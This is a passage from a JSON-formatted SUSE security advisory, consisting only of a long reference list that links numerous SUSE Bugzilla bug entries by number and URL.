"url": "https://bugzilla.suse.com/1255842"
},
{
"category": "self",
"summary": "SUSE Bug 1255843",
"url": "https://bugzilla.suse.com/1255843"
},
{
"category": "self",
"summary": "SUSE Bug 1255872",
"url": "https://bugzilla.suse.com/1255872"
},
{
"category": "self",
"summary": "SUSE Bug 1255875",
"url": "https://bugzilla.suse.com/1255875"
},
{
"category": "self",
"summary": "SUSE Bug 1255879",
"url": "https://bugzilla.suse.com/1255879"
},
{
"category": "self",
"summary": "SUSE Bug 1255883",
"url": "https://bugzilla.suse.com/1255883"
},
{
"category": "self",
"summary": "SUSE Bug 1255884",
"url": "https://bugzilla.suse.com/1255884"
},
{
"category": "self",
"summary": "SUSE Bug 1255886",
"url": "https://bugzilla.suse.com/1255886"
},
{
"category": "self",
"summary": "SUSE Bug 1255888",
"url": "https://bugzilla.suse.com/1255888"
},
{
"category": "self",
"summary": "SUSE Bug 1255890",
"url": "https://bugzilla.suse.com/1255890"
},
{
"category": "self",
"summary": "SUSE Bug 1255891",
"url": "https://bugzilla.suse.com/1255891"
},
{
"category": "self",
"summary": "SUSE Bug 1255892",
"url": "https://bugzilla.suse.com/1255892"
},
{
"category": "self",
"summary": "SUSE Bug 1255899",
"url": "https://bugzilla.suse.com/1255899"
},
{
"category": "self",
"summary": "SUSE Bug 1255902",
"url": "https://bugzilla.suse.com/1255902"
},
{
"category": "self",
"summary": "SUSE Bug 1255907",
"url": "https://bugzilla.suse.com/1255907"
},
{
"category": "self",
"summary": "SUSE Bug 1255911",
"url": "https://bugzilla.suse.com/1255911"
},
{
"category": "self",
"summary": "SUSE Bug 1255915",
"url": "https://bugzilla.suse.com/1255915"
},
{
"category": "self",
"summary": "SUSE Bug 1255918",
"url": "https://bugzilla.suse.com/1255918"
},
{
"category": "self",
"summary": "SUSE Bug 1255921",
"url": "https://bugzilla.suse.com/1255921"
},
{
"category": "self",
"summary": "SUSE Bug 1255924",
"url": "https://bugzilla.suse.com/1255924"
},
{
"category": "self",
"summary": "SUSE Bug 1255925",
"url": "https://bugzilla.suse.com/1255925"
},
{
"category": "self",
"summary": "SUSE Bug 1255930",
"url": "https://bugzilla.suse.com/1255930"
},
{
"category": "self",
"summary": "SUSE Bug 1255931",
"url": "https://bugzilla.suse.com/1255931"
},
{
"category": "self",
"summary": "SUSE Bug 1255932",
"url": "https://bugzilla.suse.com/1255932"
},
{
"category": "self",
"summary": "SUSE Bug 1255934",
"url": "https://bugzilla.suse.com/1255934"
},
{
"category": "self",
"summary": "SUSE Bug 1255943",
"url": "https://bugzilla.suse.com/1255943"
},
{
"category": "self",
"summary": "SUSE Bug 1255944",
"url": "https://bugzilla.suse.com/1255944"
},
{
"category": "self",
"summary": "SUSE Bug 1255949",
"url": "https://bugzilla.suse.com/1255949"
},
{
"category": "self",
"summary": "SUSE Bug 1255951",
"url": "https://bugzilla.suse.com/1255951"
},
{
"category": "self",
"summary": "SUSE Bug 1255952",
"url": "https://bugzilla.suse.com/1255952"
},
{
"category": "self",
"summary": "SUSE Bug 1255955",
"url": "https://bugzilla.suse.com/1255955"
},
{
"category": "self",
"summary": "SUSE Bug 1255957",
"url": "https://bugzilla.suse.com/1255957"
},
{
"category": "self",
"summary": "SUSE Bug 1255961",
"url": "https://bugzilla.suse.com/1255961"
},
{
"category": "self",
"summary": "SUSE Bug 1255963",
"url": "https://bugzilla.suse.com/1255963"
},
{
"category": "self",
"summary": "SUSE Bug 1255964",
"url": "https://bugzilla.suse.com/1255964"
},
{
"category": "self",
"summary": "SUSE Bug 1255967",
"url": "https://bugzilla.suse.com/1255967"
},
{
"category": "self",
"summary": "SUSE Bug 1255974",
"url": "https://bugzilla.suse.com/1255974"
},
{
"category": "self",
"summary": "SUSE Bug 1255978",
"url": "https://bugzilla.suse.com/1255978"
},
{
"category": "self",
"summary": "SUSE Bug 1255984",
"url": "https://bugzilla.suse.com/1255984"
},
{
"category": "self",
"summary": "SUSE Bug 1255988",
"url": "https://bugzilla.suse.com/1255988"
},
{
"category": "self",
"summary": "SUSE Bug 1255990",
"url": "https://bugzilla.suse.com/1255990"
},
{
"category": "self",
"summary": "SUSE Bug 1255992",
"url": "https://bugzilla.suse.com/1255992"
},
{
"category": "self",
"summary": "SUSE Bug 1255993",
"url": "https://bugzilla.suse.com/1255993"
},
{
"category": "self",
"summary": "SUSE Bug 1255994",
"url": "https://bugzilla.suse.com/1255994"
},
{
"category": "self",
"summary": "SUSE Bug 1255996",
"url": "https://bugzilla.suse.com/1255996"
},
{
"category": "self",
"summary": "SUSE Bug 1256033",
"url": "https://bugzilla.suse.com/1256033"
},
{
"category": "self",
"summary": "SUSE Bug 1256034",
"url": "https://bugzilla.suse.com/1256034"
},
{
"category": "self",
"summary": "SUSE Bug 1256045",
"url": "https://bugzilla.suse.com/1256045"
},
{
"category": "self",
"summary": "SUSE Bug 1256050",
"url": "https://bugzilla.suse.com/1256050"
},
{
"category": "self",
"summary": "SUSE Bug 1256058",
"url": "https://bugzilla.suse.com/1256058"
},
{
"category": "self",
"summary": "SUSE Bug 1256071",
"url": "https://bugzilla.suse.com/1256071"
},
{
"category": "self",
"summary": "SUSE Bug 1256074",
"url": "https://bugzilla.suse.com/1256074"
},
{
"category": "self",
"summary": "SUSE Bug 1256081",
"url": "https://bugzilla.suse.com/1256081"
},
{
"category": "self",
"summary": "SUSE Bug 1256082",
"url": "https://bugzilla.suse.com/1256082"
},
{
"category": "self",
"summary": "SUSE Bug 1256083",
"url": "https://bugzilla.suse.com/1256083"
},
{
"category": "self",
"summary": "SUSE Bug 1256084",
"url": "https://bugzilla.suse.com/1256084"
},
{
"category": "self",
"summary": "SUSE Bug 1256085",
"url": "https://bugzilla.suse.com/1256085"
},
{
"category": "self",
"summary": "SUSE Bug 1256090",
"url": "https://bugzilla.suse.com/1256090"
},
{
"category": "self",
"summary": "SUSE Bug 1256093",
"url": "https://bugzilla.suse.com/1256093"
},
{
"category": "self",
"summary": "SUSE Bug 1256094",
"url": "https://bugzilla.suse.com/1256094"
},
{
"category": "self",
"summary": "SUSE Bug 1256095",
"url": "https://bugzilla.suse.com/1256095"
},
{
"category": "self",
"summary": "SUSE Bug 1256096",
"url": "https://bugzilla.suse.com/1256096"
},
{
"category": "self",
"summary": "SUSE Bug 1256099",
"url": "https://bugzilla.suse.com/1256099"
},
{
"category": "self",
"summary": "SUSE Bug 1256100",
"url": "https://bugzilla.suse.com/1256100"
},
{
"category": "self",
"summary": "SUSE Bug 1256104",
"url": "https://bugzilla.suse.com/1256104"
},
{
"category": "self",
"summary": "SUSE Bug 1256106",
"url": "https://bugzilla.suse.com/1256106"
},
{
"category": "self",
"summary": "SUSE Bug 1256107",
"url": "https://bugzilla.suse.com/1256107"
},
{
"category": "self",
"summary": "SUSE Bug 1256117",
"url": "https://bugzilla.suse.com/1256117"
},
{
"category": "self",
"summary": "SUSE Bug 1256119",
"url": "https://bugzilla.suse.com/1256119"
},
{
"category": "self",
"summary": "SUSE Bug 1256121",
"url": "https://bugzilla.suse.com/1256121"
},
{
"category": "self",
"summary": "SUSE Bug 1256145",
"url": "https://bugzilla.suse.com/1256145"
},
{
"category": "self",
"summary": "SUSE Bug 1256153",
"url": "https://bugzilla.suse.com/1256153"
},
{
"category": "self",
"summary": "SUSE Bug 1256178",
"url": "https://bugzilla.suse.com/1256178"
},
{
"category": "self",
"summary": "SUSE Bug 1256197",
"url": "https://bugzilla.suse.com/1256197"
},
{
"category": "self",
"summary": "SUSE Bug 1256231",
"url": "https://bugzilla.suse.com/1256231"
},
{
"category": "self",
"summary": "SUSE Bug 1256233",
"url": "https://bugzilla.suse.com/1256233"
},
{
"category": "self",
"summary": "SUSE Bug 1256234",
"url": "https://bugzilla.suse.com/1256234"
},
{
"category": "self",
"summary": "SUSE Bug 1256238",
"url": "https://bugzilla.suse.com/1256238"
},
{
"category": "self",
"summary": "SUSE Bug 1256263",
"url": "https://bugzilla.suse.com/1256263"
},
{
"category": "self",
"summary": "SUSE Bug 1256267",
"url": "https://bugzilla.suse.com/1256267"
},
{
"category": "self",
"summary": "SUSE Bug 1256268",
"url": "https://bugzilla.suse.com/1256268"
},
{
"category": "self",
"summary": "SUSE Bug 1256271",
"url": "https://bugzilla.suse.com/1256271"
},
{
"category": "self",
"summary": "SUSE Bug 1256273",
"url": "https://bugzilla.suse.com/1256273"
},
{
"category": "self",
"summary": "SUSE Bug 1256274",
"url": "https://bugzilla.suse.com/1256274"
},
{
"category": "self",
"summary": "SUSE Bug 1256279",
"url": "https://bugzilla.suse.com/1256279"
},
{
"category": "self",
"summary": "SUSE Bug 1256280",
"url": "https://bugzilla.suse.com/1256280"
},
{
"category": "self",
"summary": "SUSE Bug 1256285",
"url": "https://bugzilla.suse.com/1256285"
},
{
"category": "self",
"summary": "SUSE Bug 1256291",
"url": "https://bugzilla.suse.com/1256291"
},
{
"category": "self",
"summary": "SUSE Bug 1256292",
"url": "https://bugzilla.suse.com/1256292"
},
{
"category": "self",
"summary": "SUSE Bug 1256300",
"url": "https://bugzilla.suse.com/1256300"
},
{
"category": "self",
"summary": "SUSE Bug 1256301",
"url": "https://bugzilla.suse.com/1256301"
},
{
"category": "self",
"summary": "SUSE Bug 1256302",
"url": "https://bugzilla.suse.com/1256302"
},
{
"category": "self",
"summary": "SUSE Bug 1256335",
"url": "https://bugzilla.suse.com/1256335"
},
{
"category": "self",
"summary": "SUSE Bug 1256348",
"url": "https://bugzilla.suse.com/1256348"
},
{
"category": "self",
"summary": "SUSE Bug 1256351",
"url": "https://bugzilla.suse.com/1256351"
},
{
"category": "self",
"summary": "SUSE Bug 1256354",
"url": "https://bugzilla.suse.com/1256354"
},
{
"category": "self",
"summary": "SUSE Bug 1256358",
"url": "https://bugzilla.suse.com/1256358"
},
{
"category": "self",
"summary": "SUSE Bug 1256361",
"url": "https://bugzilla.suse.com/1256361"
},
{
"category": "self",
"summary": "SUSE Bug 1256364",
"url": "https://bugzilla.suse.com/1256364"
},
{
"category": "self",
"summary": "SUSE Bug 1256366",
"url": "https://bugzilla.suse.com/1256366"
},
{
"category": "self",
"summary": "SUSE Bug 1256367",
"url": "https://bugzilla.suse.com/1256367"
},
{
"category": "self",
"summary": "SUSE Bug 1256368",
"url": "https://bugzilla.suse.com/1256368"
},
{
"category": "self",
"summary": "SUSE Bug 1256369",
"url": "https://bugzilla.suse.com/1256369"
},
{
"category": "self",
"summary": "SUSE Bug 1256370",
"url": "https://bugzilla.suse.com/1256370"
},
{
"category": "self",
"summary": "SUSE Bug 1256371",
"url": "https://bugzilla.suse.com/1256371"
},
{
"category": "self",
"summary": "SUSE Bug 1256373",
"url": "https://bugzilla.suse.com/1256373"
},
{
"category": "self",
"summary": "SUSE Bug 1256375",
"url": "https://bugzilla.suse.com/1256375"
},
{
"category": "self",
"summary": "SUSE Bug 1256379",
"url": "https://bugzilla.suse.com/1256379"
},
{
"category": "self",
"summary": "SUSE Bug 1256387",
"url": "https://bugzilla.suse.com/1256387"
},
{
"category": "self",
"summary": "SUSE Bug 1256394",
"url": "https://bugzilla.suse.com/1256394"
},
{
"category": "self",
"summary": "SUSE Bug 1256395",
"url": "https://bugzilla.suse.com/1256395"
},
{
"category": "self",
"summary": "SUSE Bug 1256396",
"url": "https://bugzilla.suse.com/1256396"
},
{
"category": "self",
"summary": "SUSE Bug 1256528",
"url": "https://bugzilla.suse.com/1256528"
},
{
"category": "self",
"summary": "SUSE Bug 1256564",
"url": "https://bugzilla.suse.com/1256564"
},
{
"category": "self",
"summary": "SUSE Bug 1256579",
"url": "https://bugzilla.suse.com/1256579"
},
{
"category": "self",
"summary": "SUSE Bug 1256582",
"url": "https://bugzilla.suse.com/1256582"
},
{
"category": "self",
"summary": "SUSE Bug 1256584",
"url": "https://bugzilla.suse.com/1256584"
},
{
"category": "self",
"summary": "SUSE Bug 1256586",
"url": "https://bugzilla.suse.com/1256586"
},
{
"category": "self",
"summary": "SUSE Bug 1256591",
"url": "https://bugzilla.suse.com/1256591"
},
{
"category": "self",
"summary": "SUSE Bug 1256593",
"url": "https://bugzilla.suse.com/1256593"
},
{
"category": "self",
"summary": "SUSE Bug 1256597",
"url": "https://bugzilla.suse.com/1256597"
},
{
"category": "self",
"summary": "SUSE Bug 1256605",
"url": "https://bugzilla.suse.com/1256605"
},
{
"category": "self",
"summary": "SUSE Bug 1256606",
"url": "https://bugzilla.suse.com/1256606"
},
{
"category": "self",
"summary": "SUSE Bug 1256607",
"url": "https://bugzilla.suse.com/1256607"
},
{
"category": "self",
"summary": "SUSE Bug 1256609",
"url": "https://bugzilla.suse.com/1256609"
},
{
"category": "self",
"summary": "SUSE Bug 1256610",
"url": "https://bugzilla.suse.com/1256610"
},
{
"category": "self",
"summary": "SUSE Bug 1256611",
"url": "https://bugzilla.suse.com/1256611"
},
{
"category": "self",
"summary": "SUSE Bug 1256612",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "self",
"summary": "SUSE Bug 1256613",
"url": "https://bugzilla.suse.com/1256613"
},
{
"category": "self",
"summary": "SUSE Bug 1256616",
"url": "https://bugzilla.suse.com/1256616"
},
{
"category": "self",
"summary": "SUSE Bug 1256617",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "self",
"summary": "SUSE Bug 1256619",
"url": "https://bugzilla.suse.com/1256619"
},
{
"category": "self",
"summary": "SUSE Bug 1256622",
"url": "https://bugzilla.suse.com/1256622"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256625",
"url": "https://bugzilla.suse.com/1256625"
},
{
"category": "self",
"summary": "SUSE Bug 1256628",
"url": "https://bugzilla.suse.com/1256628"
},
{
"category": "self",
"summary": "SUSE Bug 1256630",
"url": "https://bugzilla.suse.com/1256630"
},
{
"category": "self",
"summary": "SUSE Bug 1256638",
"url": "https://bugzilla.suse.com/1256638"
},
{
"category": "self",
"summary": "SUSE Bug 1256640",
"url": "https://bugzilla.suse.com/1256640"
},
{
"category": "self",
"summary": "SUSE Bug 1256641",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256646",
"url": "https://bugzilla.suse.com/1256646"
},
{
"category": "self",
"summary": "SUSE Bug 1256650",
"url": "https://bugzilla.suse.com/1256650"
},
{
"category": "self",
"summary": "SUSE Bug 1256651",
"url": "https://bugzilla.suse.com/1256651"
},
{
"category": "self",
"summary": "SUSE Bug 1256653",
"url": "https://bugzilla.suse.com/1256653"
},
{
"category": "self",
"summary": "SUSE Bug 1256654",
"url": "https://bugzilla.suse.com/1256654"
},
{
"category": "self",
"summary": "SUSE Bug 1256655",
"url": "https://bugzilla.suse.com/1256655"
},
{
"category": "self",
"summary": "SUSE Bug 1256659",
"url": "https://bugzilla.suse.com/1256659"
},
{
"category": "self",
"summary": "SUSE Bug 1256660",
"url": "https://bugzilla.suse.com/1256660"
},
{
"category": "self",
"summary": "SUSE Bug 1256664",
"url": "https://bugzilla.suse.com/1256664"
},
{
"category": "self",
"summary": "SUSE Bug 1256665",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "self",
"summary": "SUSE Bug 1256674",
"url": "https://bugzilla.suse.com/1256674"
},
{
"category": "self",
"summary": "SUSE Bug 1256679",
"url": "https://bugzilla.suse.com/1256679"
},
{
"category": "self",
"summary": "SUSE Bug 1256680",
"url": "https://bugzilla.suse.com/1256680"
},
{
"category": "self",
"summary": "SUSE Bug 1256682",
"url": "https://bugzilla.suse.com/1256682"
},
{
"category": "self",
"summary": "SUSE Bug 1256683",
"url": "https://bugzilla.suse.com/1256683"
},
{
"category": "self",
"summary": "SUSE Bug 1256688",
"url": "https://bugzilla.suse.com/1256688"
},
{
"category": "self",
"summary": "SUSE Bug 1256689",
"url": "https://bugzilla.suse.com/1256689"
},
{
"category": "self",
"summary": "SUSE Bug 1256708",
"url": "https://bugzilla.suse.com/1256708"
},
{
"category": "self",
"summary": "SUSE Bug 1256716",
"url": "https://bugzilla.suse.com/1256716"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256728",
"url": "https://bugzilla.suse.com/1256728"
},
{
"category": "self",
"summary": "SUSE Bug 1256730",
"url": "https://bugzilla.suse.com/1256730"
},
{
"category": "self",
"summary": "SUSE Bug 1256733",
"url": "https://bugzilla.suse.com/1256733"
},
{
"category": "self",
"summary": "SUSE Bug 1256737",
"url": "https://bugzilla.suse.com/1256737"
},
{
"category": "self",
"summary": "SUSE Bug 1256741",
"url": "https://bugzilla.suse.com/1256741"
},
{
"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256755",
"url": "https://bugzilla.suse.com/1256755"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256802",
"url": "https://bugzilla.suse.com/1256802"
},
{
"category": "self",
"summary": "SUSE Bug 1256861",
"url": "https://bugzilla.suse.com/1256861"
},
{
"category": "self",
"summary": "SUSE Bug 1256863",
"url": "https://bugzilla.suse.com/1256863"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257159",
"url": "https://bugzilla.suse.com/1257159"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257179",
"url": "https://bugzilla.suse.com/1257179"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257209",
"url": "https://bugzilla.suse.com/1257209"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257228",
"url": "https://bugzilla.suse.com/1257228"
},
{
"category": "self",
"summary": "SUSE Bug 1257231",
"url": "https://bugzilla.suse.com/1257231"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257246",
"url": "https://bugzilla.suse.com/1257246"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257332",
"url": "https://bugzilla.suse.com/1257332"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257552",
"url": "https://bugzilla.suse.com/1257552"
},
{
"category": "self",
"summary": "SUSE Bug 1257554",
"url": "https://bugzilla.suse.com/1257554"
},
{
"category": "self",
"summary": "SUSE Bug 1257557",
"url": "https://bugzilla.suse.com/1257557"
},
{
"category": "self",
"summary": "SUSE Bug 1257559",
"url": "https://bugzilla.suse.com/1257559"
},
{
"category": "self",
"summary": "SUSE Bug 1257560",
"url": "https://bugzilla.suse.com/1257560"
},
{
"category": "self",
"summary": "SUSE Bug 1257562",
"url": "https://bugzilla.suse.com/1257562"
},
{
"category": "self",
"summary": "SUSE Bug 1257570",
"url": "https://bugzilla.suse.com/1257570"
},
{
"category": "self",
"summary": "SUSE Bug 1257573",
"url": "https://bugzilla.suse.com/1257573"
},
{
"category": "self",
"summary": "SUSE Bug 1257576",
"url": "https://bugzilla.suse.com/1257576"
},
{
"category": "self",
"summary": "SUSE Bug 1257579",
"url": "https://bugzilla.suse.com/1257579"
},
{
"category": "self",
"summary": "SUSE Bug 1257580",
"url": "https://bugzilla.suse.com/1257580"
},
{
"category": "self",
"summary": "SUSE Bug 1257586",
"url": "https://bugzilla.suse.com/1257586"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE Bug 1257635",
"url": "https://bugzilla.suse.com/1257635"
},
{
"category": "self",
"summary": "SUSE Bug 1257679",
"url": "https://bugzilla.suse.com/1257679"
},
{
"category": "self",
"summary": "SUSE Bug 1257687",
"url": "https://bugzilla.suse.com/1257687"
},
{
"category": "self",
"summary": "SUSE Bug 1257704",
"url": "https://bugzilla.suse.com/1257704"
},
{
"category": "self",
"summary": "SUSE Bug 1257706",
"url": "https://bugzilla.suse.com/1257706"
},
{
"category": "self",
"summary": "SUSE Bug 1257707",
"url": "https://bugzilla.suse.com/1257707"
},
{
"category": "self",
"summary": "SUSE Bug 1257714",
"url": "https://bugzilla.suse.com/1257714"
},
{
"category": "self",
"summary": "SUSE Bug 1257715",
"url": "https://bugzilla.suse.com/1257715"
},
{
"category": "self",
"summary": "SUSE Bug 1257716",
"url": "https://bugzilla.suse.com/1257716"
},
{
"category": "self",
"summary": "SUSE Bug 1257718",
"url": "https://bugzilla.suse.com/1257718"
},
{
"category": "self",
"summary": "SUSE Bug 1257722",
"url": "https://bugzilla.suse.com/1257722"
},
{
"category": "self",
"summary": "SUSE Bug 1257723",
"url": "https://bugzilla.suse.com/1257723"
},
{
"category": "self",
"summary": "SUSE Bug 1257729",
"url": "https://bugzilla.suse.com/1257729"
},
{
"category": "self",
"summary": "SUSE Bug 1257735",
"url": "https://bugzilla.suse.com/1257735"
},
{
"category": "self",
"summary": "SUSE Bug 1257739",
"url": "https://bugzilla.suse.com/1257739"
},
{
"category": "self",
"summary": "SUSE Bug 1257740",
"url": "https://bugzilla.suse.com/1257740"
},
{
"category": "self",
"summary": "SUSE Bug 1257741",
"url": "https://bugzilla.suse.com/1257741"
},
{
"category": "self",
"summary": "SUSE Bug 1257743",
"url": "https://bugzilla.suse.com/1257743"
},
{
"category": "self",
"summary": "SUSE Bug 1257745",
"url": "https://bugzilla.suse.com/1257745"
},
{
"category": "self",
"summary": "SUSE Bug 1257749",
"url": "https://bugzilla.suse.com/1257749"
},
{
"category": "self",
"summary": "SUSE Bug 1257750",
"url": "https://bugzilla.suse.com/1257750"
},
{
"category": "self",
"summary": "SUSE Bug 1257757",
"url": "https://bugzilla.suse.com/1257757"
},
{
"category": "self",
"summary": "SUSE Bug 1257758",
"url": "https://bugzilla.suse.com/1257758"
},
{
"category": "self",
"summary": "SUSE Bug 1257759",
"url": "https://bugzilla.suse.com/1257759"
},
{
"category": "self",
"summary": "SUSE Bug 1257761",
"url": "https://bugzilla.suse.com/1257761"
},
{
"category": "self",
"summary": "SUSE Bug 1257762",
"url": "https://bugzilla.suse.com/1257762"
},
{
"category": "self",
"summary": "SUSE Bug 1257763",
"url": "https://bugzilla.suse.com/1257763"
},
{
"category": "self",
"summary": "SUSE Bug 1257765",
"url": "https://bugzilla.suse.com/1257765"
},
{
"category": "self",
"summary": "SUSE Bug 1257768",
"url": "https://bugzilla.suse.com/1257768"
},
{
"category": "self",
"summary": "SUSE Bug 1257770",
"url": "https://bugzilla.suse.com/1257770"
},
{
"category": "self",
"summary": "SUSE Bug 1257772",
"url": "https://bugzilla.suse.com/1257772"
},
{
"category": "self",
"summary": "SUSE Bug 1257775",
"url": "https://bugzilla.suse.com/1257775"
},
{
"category": "self",
"summary": "SUSE Bug 1257776",
"url": "https://bugzilla.suse.com/1257776"
},
{
"category": "self",
"summary": "SUSE Bug 1257788",
"url": "https://bugzilla.suse.com/1257788"
},
{
"category": "self",
"summary": "SUSE Bug 1257789",
"url": "https://bugzilla.suse.com/1257789"
},
{
"category": "self",
"summary": "SUSE Bug 1257790",
"url": "https://bugzilla.suse.com/1257790"
},
{
"category": "self",
"summary": "SUSE Bug 1257805",
"url": "https://bugzilla.suse.com/1257805"
},
{
"category": "self",
"summary": "SUSE Bug 1257808",
"url": "https://bugzilla.suse.com/1257808"
},
{
"category": "self",
"summary": "SUSE Bug 1257809",
"url": "https://bugzilla.suse.com/1257809"
},
{
"category": "self",
"summary": "SUSE Bug 1257811",
"url": "https://bugzilla.suse.com/1257811"
},
{
"category": "self",
"summary": "SUSE Bug 1257813",
"url": "https://bugzilla.suse.com/1257813"
},
{
"category": "self",
"summary": "SUSE Bug 1257816",
"url": "https://bugzilla.suse.com/1257816"
},
{
"category": "self",
"summary": "SUSE Bug 1257830",
"url": "https://bugzilla.suse.com/1257830"
},
{
"category": "self",
"summary": "SUSE Bug 1257891",
"url": "https://bugzilla.suse.com/1257891"
},
{
"category": "self",
"summary": "SUSE Bug 1257952",
"url": "https://bugzilla.suse.com/1257952"
},
{
"category": "self",
"summary": "SUSE Bug 1258153",
"url": "https://bugzilla.suse.com/1258153"
},
{
"category": "self",
"summary": "SUSE Bug 1258181",
"url": "https://bugzilla.suse.com/1258181"
},
{
"category": "self",
"summary": "SUSE Bug 1258184",
"url": "https://bugzilla.suse.com/1258184"
},
{
"category": "self",
"summary": "SUSE Bug 1258222",
"url": "https://bugzilla.suse.com/1258222"
},
{
"category": "self",
"summary": "SUSE Bug 1258234",
"url": "https://bugzilla.suse.com/1258234"
},
{
"category": "self",
"summary": "SUSE Bug 1258237",
"url": "https://bugzilla.suse.com/1258237"
},
{
"category": "self",
"summary": "SUSE Bug 1258245",
"url": "https://bugzilla.suse.com/1258245"
},
{
"category": "self",
"summary": "SUSE Bug 1258249",
"url": "https://bugzilla.suse.com/1258249"
},
{
"category": "self",
"summary": "SUSE Bug 1258252",
"url": "https://bugzilla.suse.com/1258252"
},
{
"category": "self",
"summary": "SUSE Bug 1258256",
"url": "https://bugzilla.suse.com/1258256"
},
{
"category": "self",
"summary": "SUSE Bug 1258259",
"url": "https://bugzilla.suse.com/1258259"
},
{
"category": "self",
"summary": "SUSE Bug 1258272",
"url": "https://bugzilla.suse.com/1258272"
},
{
"category": "self",
"summary": "SUSE Bug 1258273",
"url": "https://bugzilla.suse.com/1258273"
},
{
"category": "self",
"summary": "SUSE Bug 1258277",
"url": "https://bugzilla.suse.com/1258277"
},
{
"category": "self",
"summary": "SUSE Bug 1258278",
"url": "https://bugzilla.suse.com/1258278"
},
{
"category": "self",
"summary": "SUSE Bug 1258279",
"url": "https://bugzilla.suse.com/1258279"
},
{
"category": "self",
"summary": "SUSE Bug 1258299",
